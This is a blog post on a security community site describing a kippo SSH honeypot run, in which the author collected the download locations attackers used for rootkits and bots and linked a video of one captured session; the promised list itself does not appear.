On the 23th of July I started with the SSH honeypot kippo. So after a good two months I decided to collect all the urls/locations those “1337 h4x0rs” are wgetting all their files from.
(rootkits/ircbots/scanners)
I came up with the following list:

Now, I am not saying that these sites are “evil”. Chances are most likely that they are compromised themselves. So, just simply putting them on a blacklist isn't a good idea.

Some of these links contain open directories, including all sorts of files, while other sites simply may have disappeared into thin air. It's purely a list I extracted from the database my kippo is writing
it's results to.
As kippo also stores the obtained files, I have a copy of every single one of them for further analysis.
Use this information and/or containing files at you own risk.

Kippo also keeps track of every typed command in every “session”

One particular session I found too funny not sharing it:


http://www.youtube.com/watch?v=FwZCWcfwzZ0


Thanks to Justin Elze, for helping me out with the video.

Views: 484

Comment

You need to be a member of Dissecting The Hack to add comments!

Join Dissecting The Hack

Comment by Ken Pryor on October 4, 2010 at 11:08am
This was great fun to watch and good info too. Thanks Leon! I may have to give Kippo a try since I'm not having much luck attracting what I want with dionaea.
Comment by Jayson E. Street on September 28, 2010 at 7:55am

Latest Activity

Anton Vyacheslav is now a member of Dissecting The Hack
Dec 9, 2018
bernardorichard updated their profile
Nov 28, 2018
Sam Mccalla is now a member of Dissecting The Hack
Nov 19, 2018
bernardorichard is now a member of Dissecting The Hack
Oct 24, 2018

© 2019   Created by Marcus J. Carey.   Powered by

Badges  |  Report an Issue  |  Terms of Service